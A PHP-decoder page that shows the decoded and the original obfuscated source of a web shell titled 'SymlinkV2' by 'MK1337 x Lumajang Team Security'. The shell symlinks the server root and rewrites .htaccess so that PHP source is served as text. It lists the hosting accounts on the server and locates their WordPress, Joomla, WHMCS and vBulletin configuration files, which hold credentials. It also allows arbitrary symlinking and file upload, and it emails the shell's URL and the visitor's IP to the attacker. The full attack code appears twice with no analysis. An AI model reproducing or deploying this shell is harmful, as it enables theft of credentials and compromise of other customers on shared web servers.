Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? goto oeKjl; ioQnU: ${${"GLOBALS"}["rdrv_geuaaziphaoulzbpqpbvuy_sl_snlctbut"]} = "..
Decoded Output download
<? goto oeKjl; ioQnU: ${${"GLOBALS"}["rdrv_geuaaziphaoulzbpqpbvuy_sl_snlctbut"]} = "fix {${${"GLOBALS"}["znzdtrxyscefi_velgrwjsdtorcrgwtagkioh"]}} :p *IP Address : [ " . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["REMOTE_ADDR"] . " ]"; goto m0icN; Wi0f9: echo "<br /><div class="hedr"><font color="#009900">-:[ MK1337 x Lumajang Team Security ]:-</font><br /><br /></div>"; goto HIW7V; xSBsT: $IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1) - 1], '', $IIIIIIIIIIIl); goto bx01h; aKnWA: echo "<br /><div class="hedr"> <font color="white">JAYALAH</font> <font color="red">JANDAKU!</a> <br /></div>"; goto Wi0f9; wR5rr: $IIIIIIIIIlIl = basename("index.php"); goto aKnWA; RDVIA: fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); goto oSl1N; oeKjl: echo " "; goto XHT3A; m0icN: mail(${${"GLOBALS"}["_a_r_ijovdpzzhglbzhgkxr"]}, "LOGGER", ${${"GLOBALS"}["rdrv_geuaaziphaoulzbpqpbvuy_sl_snlctbut"]}, "[ " . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["REMOTE_ADDR"] . " ]"); goto OV4d_; tgmS9: ini_set("memory_limit", "64M"); goto VbSyL; nl5b0: ${${"GLOBALS"}["znzdtrxyscefi_velgrwjsdtorcrgwtagkioh"]} = "http://" . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["SERVER_NAME"] . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["REQUEST_URI"]; goto ioQnU; I18fF: ${"GLOBALS"}["_a_r_ijovdpzzhglbzhgkxr"] = "tujuanmail"; goto BSra3; Z25RY: $IIIIIIIIIII1 = explode("/", $IIIIIIIIIIIl); goto xSBsT; VbSyL: header("Content-Type: text/html; charset=UTF-8"); goto jg3Ox; oSl1N: @symlink("/", "mk1337/root"); goto wR5rr; BSra3: ${"GLOBALS"}["znzdtrxyscefi_velgrwjsdtorcrgwtagkioh"] = "x_path"; goto pE0Ld; jg3Ox: ${${"GLOBALS"}["_a_r_ijovdpzzhglbzhgkxr"]} = "[email protected], [email protected]"; goto nl5b0; nSFyQ: $IIIIIIIIIIIl = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto Z25RY; HIW7V: echo "<div class="cont">
\xa[<a href="?"> Home </a>]\xa
[<a href="?sws=mk1337"> User & Domains & Symlink </a>]
\xa[<a href="?sws=sec"> Domains & Script </a>]
\xa[ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />\xa\xa
\xa\xa
</div>"; goto ds4kG; XHT3A: @set_time_limit(0); goto nSFyQ; AgEXO: @mkdir("mk1337", 511); goto sQHVb; bx01h: echo " <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>\xa
<head>
<title>SymlinkV2 — MK1337 - Lumajang Team Security</title>
<meta name="description" content="SymlinkV2 &mdash MK1337 - Lumajang Team Security">
<meta content="MataKucing" name="author">
<link rel="icon" href="https://d.top4top.io/p_20605rvdu1.png" />
<link rel="shortcut-icon" href="https://d.top4top.io/p_20605rvdu1.png">\xa
<style type="text/css">
html,body {\xa margin: 0;
padding: 0;\xa outline: 0;\xa}\xa
body {
background-image: url("https://b.top4top.io/p_2061hyv9d1.jpg");\xa background-repeat: no-repeat;\xa margin: 0px;\xa padding: 50px;
padding-top: 100px;
color: #FFF;\xa font-family: Calibri;\xa font-size: 13px;
text-align: center
}\xa\xainput,textarea,select{\xacolor: #222222;\xa text-shadow: #000 0px 0px 4px;\xa font-weight: bold;\xa border: 2px solid #007700;
background: #ababab;\xa box-shadow: 0px 0px 4px #007700;;\xa -webkit-box-shadow: rgb(0, 119, 0) 0px 0px 4px;\xa -moz-box-shadow: rgb(0, 119, 0) 0px 0px 4px;\xa}\xa
\xa.hedr {
font-family: Tahoma, Arial, sans-serif ;\xa font-size: 22px;\xa
}
.cont a{\xawidth: 1000px;\xa /*border: 1px solid #007700;*/\xa color: #009900;
box-shadow: 0px 0px 4px #007700;\xa}
.cont a:hover{
\xa/* color: #e4e4e4; */
text-shadow: #00bb00 0px 0px 4px;
box-shadow: 0px 0px 4px #00bb00;
border: 1px solid #00bb00;\xa -webkit-border-radius: 4px;\xa -moz-border-radius: 4px;\xa border-radius: 4px;\xa -webkit-box-shadow: rgba(0, 221, 0) 0px 0px 4px;
-moz-box-shadow: rgba(0, 221, 0) 0px 0px 4px;\xa\xa\xa}
.tmp tr td{
\xaborder: solid 1px #BBBBBB;\xa\xapadding: 2px ;\xa font-size: 13px;
}\xa\xa.tmp tr td a {
text-decoration: none;
}\xa\xa.foter{\xa font-size: 9pt;
color: #AAAAAA ;
text-align: center\xa}
\xa.tmp tr td:hover{
/* color: #e4e4e4; */
text-shadow: #00bb00 0px 0px 4px;\xa box-shadow: 0px 0px 4px #00bb00;
border: 1px solid #00bb00;
-webkit-border-radius: 4px;\xa -moz-border-radius: 4px;
border-radius: 4px;\xa -webkit-box-shadow: rgba(0, 221, 0) 0px 0px 4px;\xa -moz-box-shadow: rgba(0, 221, 0) 0px 0px 4px;\xa\xa}\xa .fot\xa {
text-shadow: #00bb00 0px 0px 4px;
color: #FFF;
font-family: Calibri;\xa font-size: 13px;
color: #009900;
}\xa\xa.ir {
color: #FF0000;\xa}
\xa
.mk1337{\xamax-width: -webkit-fill-available;\xa width: 1000px;\xa border: 1px solid #007700;\xa box-shadow: 0px 0px 4px #007700;
}
</style>
\xa</head>
\xa<body><center>\xa<div class="mk1337">
<div class='all'>\xa
"; goto AgEXO; iE3Qj: set_time_limit(0); goto tgmS9; B2wXQ: @ini_set("display_errors", 0); goto iE3Qj; NIafz: ${"GLOBALS"}["rdrv_geuaaziphaoulzbpqpbvuy_sl_snlctbut"] = "pesan_alert"; goto vUFCA; xypHg: $IIIIIIIIII1I = @fopen("mk1337/.htaccess", "w"); goto RDVIA; ds4kG: if (isset($_REQUEST["sws"])) { switch ($_REQUEST["sws"]) { case "sec": $IIIIIIIIIllI = @file("/etc/named.conf"); if (!$IIIIIIIIIllI) { die(" can't read /etc/named.conf"); } else { echo "<div class='tmp'>\xa<table align='center' width='40%'><td> Domains </td><td> Script </td>"; foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) { if (eregi("zone", $IIIIIIIIIll1)) { preg_match_all("#zone "(.*)"#", $IIIIIIIIIll1, $IIIIIIIIIl11); flush(); if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) { $IIIIIIIII1I1 = posix_getpwuid(@fileowner("/etc/valiases/" . $IIIIIIIIIl11[1][0])); $IIIIIIIII1l1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/wp-config.php"; $IIIIIIIII11I = get_headers($IIIIIIIII1l1); $IIIIIIIII11l = $IIIIIIIII11I[0]; $IIIIIIIII111 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/blog/wp-config.php"; $IIIIIIIIlIII = get_headers($IIIIIIIII111); $IIIIIIIIlIIl = $IIIIIIIIlIII[0]; $IIIIIIIIlII1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/configuration.php"; $IIIIIIIIlIlI = get_headers($IIIIIIIIlII1); $IIIIIIIIlIll = $IIIIIIIIlIlI[0]; $IIIIIIIIlIl1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/joomla/configuration.php"; $IIIIIIIIlI1I = get_headers($IIIIIIIIlIl1); $IIIIIIIIlI1l = $IIIIIIIIlI1I[0]; $IIIIIIIIlI11 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/includes/config.php"; $IIIIIIIIllII = get_headers($IIIIIIIIlI11); $IIIIIIIIllIl = $IIIIIIIIllII[0]; $IIIIIIIIllI1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/vb/includes/config.php"; $IIIIIIIIlllI = get_headers($IIIIIIIIllI1); $IIIIIIIIllll = $IIIIIIIIlllI[0]; $IIIIIIIIlll1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/forum/includes/config.php"; $IIIIIIIIll1I = get_headers($IIIIIIIIlll1); $IIIIIIIIll1l = $IIIIIIIIll1I[0]; $IIIIIIIIll11 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "public_html/clients/configuration.php"; $IIIIIIIIl1II = get_headers($IIIIIIIIll11); $IIIIIIIIl1Il = $IIIIIIIIl1II[0]; $IIIIIIIIl1I1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/support/configuration.php"; $IIIIIIIIl1II = get_headers($IIIIIIIIl1I1); $IIIIIIIIl1lI = $IIIIIIIIl1II[0]; $IIIIIIIIl1ll = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/client/configuration.php"; $IIIIIIIIl1l1 = get_headers($IIIIIIIIl1ll); $IIIIIIIIl11I = $IIIIIIIIl1l1[0]; $IIIIIIIIl11l = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/submitticket.php"; $IIIIIIIIl111 = get_headers($IIIIIIIIl11l); $IIIIIIII1III = $IIIIIIIIl111[0]; $IIIIIIII1IIl = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/client/configuration.php"; $IIIIIIII1II1 = get_headers($IIIIIIII1IIl); $IIIIIIII1IlI = $IIIIIIII1II1[0]; $IIIIIIII1Ill = strpos($IIIIIIIII11l, "200"); $IIIIIIII1I1I = " "; if (strpos($IIIIIIIII11l, "200") == true) { $IIIIIIII1I1I = "<a href='" . $IIIIIIIII1l1 . "' target='_blank'>Wordpress</a>"; } elseif (strpos($IIIIIIIIlIIl, "200") == true) { $IIIIIIII1I1I = "<a href='" . $IIIIIIIII111 . "' target='_blank'>Wordpress</a>"; } elseif (strpos($IIIIIIIIlIll, "200") == true and strpos($IIIIIIII1III, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl11l . "' target='_blank'>WHMCS</a>"; } elseif (strpos($IIIIIIIIl1lI, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1I1 . "' target='_blank'>WHMCS</a>"; } elseif (strpos($IIIIIIIIl11I, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1ll . "' target='_blank'>WHMCS</a>"; } elseif (strpos($IIIIIIIIlIll, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlII1 . "' target='_blank'>Joomla</a>"; } elseif (strpos($IIIIIIIIlI1l, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlIl1 . "' target='_blank'>Joomla</a>"; } elseif (strpos($IIIIIIIIllIl, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlI11 . "' target='_blank'>vBulletin</a>"; } elseif (strpos($IIIIIIIIllll, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIllI1 . "' target='_blank'>vBulletin</a>"; } elseif (strpos($IIIIIIIIll1l, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlll1 . "' target='_blank'>vBulletin</a>"; } else { continue; } $IIIIIIII1I1l = $IIIIIIIII1I1["name"]; echo "<tr><td><a href=http://www." . $IIIIIIIIIl11[1][0] . "/>" . $IIIIIIIIIl11[1][0] . "</a></td>\xa<td>" . $IIIIIIII1I1I . "</td></tr>"; flush(); } } } } break; case "mk1337": $IIIIIIIIIllI = @file("/etc/named.conf"); if (!$IIIIIIIIIllI) { die(" can't read /etc/named.conf"); } else { echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>"; foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) { if (eregi("zone", $IIIIIIIIIll1)) { preg_match_all("#zone "(.*)"#", $IIIIIIIIIll1, $IIIIIIIIIl11); flush(); if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) { $IIIIIIIII1I1 = posix_getpwuid(@fileowner("/etc/valiases/" . $IIIIIIIIIl11[1][0])); $IIIIIIII1I1l = $IIIIIIIII1I1["name"]; @symlink("/", "mk1337/root"); $IIIIIIII1I1l = $IIIIIIIIIl11[1][0]; $IIIIIIII1I11 = "\.ir"; $IIIIIIII1lII = "\.il"; if (eregi("{$IIIIIIII1I11}", $IIIIIIIIIl11[1][0]) or eregi("{$IIIIIIII1lII}", $IIIIIIIIIl11[1][0])) { $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $IIIIIIIIIl11[1][0] . "</div>"; } echo "\xa<tr>
<td>
<div class='dom'><a target='_blank' href=http://www." . $IIIIIIIIIl11[1][0] . "/>" . $IIIIIIII1I1l . " </a> </div>
</td>\xa\xa\xa<td>
" . $IIIIIIIII1I1["name"] . "
</td>
\xa
\xa\xa<td>
<a href='mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html' target='_blank'>Symlink </a>\xa</td>
\xa
</tr></div> "; flush(); } } } } break; case "file": echo "
The file path to symlink\xa
<br /><br />\xa<form method="post">\xa<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: 1.txt )" size="60"/><br /><br />\xa<input type="submit" value="symlink" name="symlink" /> <br /><br />
\xa
</form>\xa"; $IIIIIIII1lIl = $_POST["file"]; $symfile = $_POST["symfile"]; $symlink = $_POST["symlink"]; if ($symlink) { @symlink("{$IIIIIIII1lIl}", "mk1337/{$symfile}"); echo "<br /><a target="_blank" href="mk1337/" . $symfile . "" >" . $symfile . "</a>"; } break; default: header("Location: {$IIIIIIIIIlIl}"); } } else { echo "<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>"; if ($_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<br /><br /><b>Uploaded successful !!<br><br>"; } else { echo "<br /><br />Not uploaded !!<br><br>"; } } echo "
<br /><br /><div class="fot">MK1337\xa<br /><br />\xaLumajang Team Security</div> "; } goto MZJi1; vUFCA: @ini_set("output_buffering", 0); goto B2wXQ; MZJi1: echo "
</div>
</div>
</body>
<audio autoplay="true" src="https://f.top4top.io/m_20526cnoz1.mp3" type="audio/mpeg"></audio>
</html>\xa"; goto I18fF; sQHVb: $IIIIIIIIIIl1 = "Options all
DirectoryIndex Sux.html \xa AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html \xa AddHandler txt .html \xa Require None
Satisfy Any"; goto xypHg; pE0Ld: ${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"] = "_SERVER"; goto NIafz; OV4d_: ?>
Did this file decode correctly?
Original Code
<? goto oeKjl; ioQnU: ${${"GLOBALS"}["rdrv_geuaaziphaoulzbpqpbvuy_sl_snlctbut"]} = "fix {${${"GLOBALS"}["znzdtrxyscefi_velgrwjsdtorcrgwtagkioh"]}} :p *IP Address : [ " . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["REMOTE_ADDR"] . " ]"; goto m0icN; Wi0f9: echo "<br /><div class="hedr"><font color="#009900">-:[ MK1337 x Lumajang Team Security ]:-</font><br /><br /></div>"; goto HIW7V; xSBsT: $IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1) - 1], '', $IIIIIIIIIIIl); goto bx01h; aKnWA: echo "<br /><div class="hedr"> <font color="white">JAYALAH</font> <font color="red">JANDAKU!</a> <br /></div>"; goto Wi0f9; wR5rr: $IIIIIIIIIlIl = basename("index.php"); goto aKnWA; RDVIA: fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); goto oSl1N; oeKjl: echo " "; goto XHT3A; m0icN: mail(${${"GLOBALS"}["_a_r_ijovdpzzhglbzhgkxr"]}, "LOGGER", ${${"GLOBALS"}["rdrv_geuaaziphaoulzbpqpbvuy_sl_snlctbut"]}, "[ " . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["REMOTE_ADDR"] . " ]"); goto OV4d_; tgmS9: ini_set("memory_limit", "64M"); goto VbSyL; nl5b0: ${${"GLOBALS"}["znzdtrxyscefi_velgrwjsdtorcrgwtagkioh"]} = "http://" . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["SERVER_NAME"] . ${${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"]}["REQUEST_URI"]; goto ioQnU; I18fF: ${"GLOBALS"}["_a_r_ijovdpzzhglbzhgkxr"] = "tujuanmail"; goto BSra3; Z25RY: $IIIIIIIIIII1 = explode("/", $IIIIIIIIIIIl); goto xSBsT; VbSyL: header("Content-Type: text/html; charset=UTF-8"); goto jg3Ox; oSl1N: @symlink("/", "mk1337/root"); goto wR5rr; BSra3: ${"GLOBALS"}["znzdtrxyscefi_velgrwjsdtorcrgwtagkioh"] = "x_path"; goto pE0Ld; jg3Ox: ${${"GLOBALS"}["_a_r_ijovdpzzhglbzhgkxr"]} = "[email protected], [email protected]"; goto nl5b0; nSFyQ: $IIIIIIIIIIIl = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto Z25RY; HIW7V: echo "<div class="cont">
\xa[<a href="?"> Home </a>]\xa
[<a href="?sws=mk1337"> User & Domains & Symlink </a>]
\xa[<a href="?sws=sec"> Domains & Script </a>]
\xa[ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />\xa\xa
\xa\xa
</div>"; goto ds4kG; XHT3A: @set_time_limit(0); goto nSFyQ; AgEXO: @mkdir("mk1337", 511); goto sQHVb; bx01h: echo " <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>\xa
<head>
<title>SymlinkV2 — MK1337 - Lumajang Team Security</title>
<meta name="description" content="SymlinkV2 &mdash MK1337 - Lumajang Team Security">
<meta content="MataKucing" name="author">
<link rel="icon" href="https://d.top4top.io/p_20605rvdu1.png" />
<link rel="shortcut-icon" href="https://d.top4top.io/p_20605rvdu1.png">\xa
<style type="text/css">
html,body {\xa margin: 0;
padding: 0;\xa outline: 0;\xa}\xa
body {
background-image: url("https://b.top4top.io/p_2061hyv9d1.jpg");\xa background-repeat: no-repeat;\xa margin: 0px;\xa padding: 50px;
padding-top: 100px;
color: #FFF;\xa font-family: Calibri;\xa font-size: 13px;
text-align: center
}\xa\xainput,textarea,select{\xacolor: #222222;\xa text-shadow: #000 0px 0px 4px;\xa font-weight: bold;\xa border: 2px solid #007700;
background: #ababab;\xa box-shadow: 0px 0px 4px #007700;;\xa -webkit-box-shadow: rgb(0, 119, 0) 0px 0px 4px;\xa -moz-box-shadow: rgb(0, 119, 0) 0px 0px 4px;\xa}\xa
\xa.hedr {
font-family: Tahoma, Arial, sans-serif ;\xa font-size: 22px;\xa
}
.cont a{\xawidth: 1000px;\xa /*border: 1px solid #007700;*/\xa color: #009900;
box-shadow: 0px 0px 4px #007700;\xa}
.cont a:hover{
\xa/* color: #e4e4e4; */
text-shadow: #00bb00 0px 0px 4px;
box-shadow: 0px 0px 4px #00bb00;
border: 1px solid #00bb00;\xa -webkit-border-radius: 4px;\xa -moz-border-radius: 4px;\xa border-radius: 4px;\xa -webkit-box-shadow: rgba(0, 221, 0) 0px 0px 4px;
-moz-box-shadow: rgba(0, 221, 0) 0px 0px 4px;\xa\xa\xa}
.tmp tr td{
\xaborder: solid 1px #BBBBBB;\xa\xapadding: 2px ;\xa font-size: 13px;
}\xa\xa.tmp tr td a {
text-decoration: none;
}\xa\xa.foter{\xa font-size: 9pt;
color: #AAAAAA ;
text-align: center\xa}
\xa.tmp tr td:hover{
/* color: #e4e4e4; */
text-shadow: #00bb00 0px 0px 4px;\xa box-shadow: 0px 0px 4px #00bb00;
border: 1px solid #00bb00;
-webkit-border-radius: 4px;\xa -moz-border-radius: 4px;
border-radius: 4px;\xa -webkit-box-shadow: rgba(0, 221, 0) 0px 0px 4px;\xa -moz-box-shadow: rgba(0, 221, 0) 0px 0px 4px;\xa\xa}\xa .fot\xa {
text-shadow: #00bb00 0px 0px 4px;
color: #FFF;
font-family: Calibri;\xa font-size: 13px;
color: #009900;
}\xa\xa.ir {
color: #FF0000;\xa}
\xa
.mk1337{\xamax-width: -webkit-fill-available;\xa width: 1000px;\xa border: 1px solid #007700;\xa box-shadow: 0px 0px 4px #007700;
}
</style>
\xa</head>
\xa<body><center>\xa<div class="mk1337">
<div class='all'>\xa
"; goto AgEXO; iE3Qj: set_time_limit(0); goto tgmS9; B2wXQ: @ini_set("display_errors", 0); goto iE3Qj; NIafz: ${"GLOBALS"}["rdrv_geuaaziphaoulzbpqpbvuy_sl_snlctbut"] = "pesan_alert"; goto vUFCA; xypHg: $IIIIIIIIII1I = @fopen("mk1337/.htaccess", "w"); goto RDVIA; ds4kG: if (isset($_REQUEST["sws"])) { switch ($_REQUEST["sws"]) { case "sec": $IIIIIIIIIllI = @file("/etc/named.conf"); if (!$IIIIIIIIIllI) { die(" can't read /etc/named.conf"); } else { echo "<div class='tmp'>\xa<table align='center' width='40%'><td> Domains </td><td> Script </td>"; foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) { if (eregi("zone", $IIIIIIIIIll1)) { preg_match_all("#zone "(.*)"#", $IIIIIIIIIll1, $IIIIIIIIIl11); flush(); if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) { $IIIIIIIII1I1 = posix_getpwuid(@fileowner("/etc/valiases/" . $IIIIIIIIIl11[1][0])); $IIIIIIIII1l1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/wp-config.php"; $IIIIIIIII11I = get_headers($IIIIIIIII1l1); $IIIIIIIII11l = $IIIIIIIII11I[0]; $IIIIIIIII111 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/blog/wp-config.php"; $IIIIIIIIlIII = get_headers($IIIIIIIII111); $IIIIIIIIlIIl = $IIIIIIIIlIII[0]; $IIIIIIIIlII1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/configuration.php"; $IIIIIIIIlIlI = get_headers($IIIIIIIIlII1); $IIIIIIIIlIll = $IIIIIIIIlIlI[0]; $IIIIIIIIlIl1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/joomla/configuration.php"; $IIIIIIIIlI1I = get_headers($IIIIIIIIlIl1); $IIIIIIIIlI1l = $IIIIIIIIlI1I[0]; $IIIIIIIIlI11 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/includes/config.php"; $IIIIIIIIllII = get_headers($IIIIIIIIlI11); $IIIIIIIIllIl = $IIIIIIIIllII[0]; $IIIIIIIIllI1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/vb/includes/config.php"; $IIIIIIIIlllI = get_headers($IIIIIIIIllI1); $IIIIIIIIllll = $IIIIIIIIlllI[0]; $IIIIIIIIlll1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/forum/includes/config.php"; $IIIIIIIIll1I = get_headers($IIIIIIIIlll1); $IIIIIIIIll1l = $IIIIIIIIll1I[0]; $IIIIIIIIll11 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "public_html/clients/configuration.php"; $IIIIIIIIl1II = get_headers($IIIIIIIIll11); $IIIIIIIIl1Il = $IIIIIIIIl1II[0]; $IIIIIIIIl1I1 = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/support/configuration.php"; $IIIIIIIIl1II = get_headers($IIIIIIIIl1I1); $IIIIIIIIl1lI = $IIIIIIIIl1II[0]; $IIIIIIIIl1ll = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/client/configuration.php"; $IIIIIIIIl1l1 = get_headers($IIIIIIIIl1ll); $IIIIIIIIl11I = $IIIIIIIIl1l1[0]; $IIIIIIIIl11l = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/submitticket.php"; $IIIIIIIIl111 = get_headers($IIIIIIIIl11l); $IIIIIIII1III = $IIIIIIIIl111[0]; $IIIIIIII1IIl = $IIIIIIIIIIIl . "/mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html/client/configuration.php"; $IIIIIIII1II1 = get_headers($IIIIIIII1IIl); $IIIIIIII1IlI = $IIIIIIII1II1[0]; $IIIIIIII1Ill = strpos($IIIIIIIII11l, "200"); $IIIIIIII1I1I = " "; if (strpos($IIIIIIIII11l, "200") == true) { $IIIIIIII1I1I = "<a href='" . $IIIIIIIII1l1 . "' target='_blank'>Wordpress</a>"; } elseif (strpos($IIIIIIIIlIIl, "200") == true) { $IIIIIIII1I1I = "<a href='" . $IIIIIIIII111 . "' target='_blank'>Wordpress</a>"; } elseif (strpos($IIIIIIIIlIll, "200") == true and strpos($IIIIIIII1III, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl11l . "' target='_blank'>WHMCS</a>"; } elseif (strpos($IIIIIIIIl1lI, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1I1 . "' target='_blank'>WHMCS</a>"; } elseif (strpos($IIIIIIIIl11I, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1ll . "' target='_blank'>WHMCS</a>"; } elseif (strpos($IIIIIIIIlIll, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlII1 . "' target='_blank'>Joomla</a>"; } elseif (strpos($IIIIIIIIlI1l, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlIl1 . "' target='_blank'>Joomla</a>"; } elseif (strpos($IIIIIIIIllIl, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlI11 . "' target='_blank'>vBulletin</a>"; } elseif (strpos($IIIIIIIIllll, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIllI1 . "' target='_blank'>vBulletin</a>"; } elseif (strpos($IIIIIIIIll1l, "200") == true) { $IIIIIIII1I1I = " <a href='" . $IIIIIIIIlll1 . "' target='_blank'>vBulletin</a>"; } else { continue; } $IIIIIIII1I1l = $IIIIIIIII1I1["name"]; echo "<tr><td><a href=http://www." . $IIIIIIIIIl11[1][0] . "/>" . $IIIIIIIIIl11[1][0] . "</a></td>\xa<td>" . $IIIIIIII1I1I . "</td></tr>"; flush(); } } } } break; case "mk1337": $IIIIIIIIIllI = @file("/etc/named.conf"); if (!$IIIIIIIIIllI) { die(" can't read /etc/named.conf"); } else { echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>"; foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) { if (eregi("zone", $IIIIIIIIIll1)) { preg_match_all("#zone "(.*)"#", $IIIIIIIIIll1, $IIIIIIIIIl11); flush(); if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) { $IIIIIIIII1I1 = posix_getpwuid(@fileowner("/etc/valiases/" . $IIIIIIIIIl11[1][0])); $IIIIIIII1I1l = $IIIIIIIII1I1["name"]; @symlink("/", "mk1337/root"); $IIIIIIII1I1l = $IIIIIIIIIl11[1][0]; $IIIIIIII1I11 = "\.ir"; $IIIIIIII1lII = "\.il"; if (eregi("{$IIIIIIII1I11}", $IIIIIIIIIl11[1][0]) or eregi("{$IIIIIIII1lII}", $IIIIIIIIIl11[1][0])) { $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $IIIIIIIIIl11[1][0] . "</div>"; } echo "\xa<tr>
<td>
<div class='dom'><a target='_blank' href=http://www." . $IIIIIIIIIl11[1][0] . "/>" . $IIIIIIII1I1l . " </a> </div>
</td>\xa\xa\xa<td>
" . $IIIIIIIII1I1["name"] . "
</td>
\xa
\xa\xa<td>
<a href='mk1337/root/home/" . $IIIIIIIII1I1["name"] . "/public_html' target='_blank'>Symlink </a>\xa</td>
\xa
</tr></div> "; flush(); } } } } break; case "file": echo "
The file path to symlink\xa
<br /><br />\xa<form method="post">\xa<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: 1.txt )" size="60"/><br /><br />\xa<input type="submit" value="symlink" name="symlink" /> <br /><br />
\xa
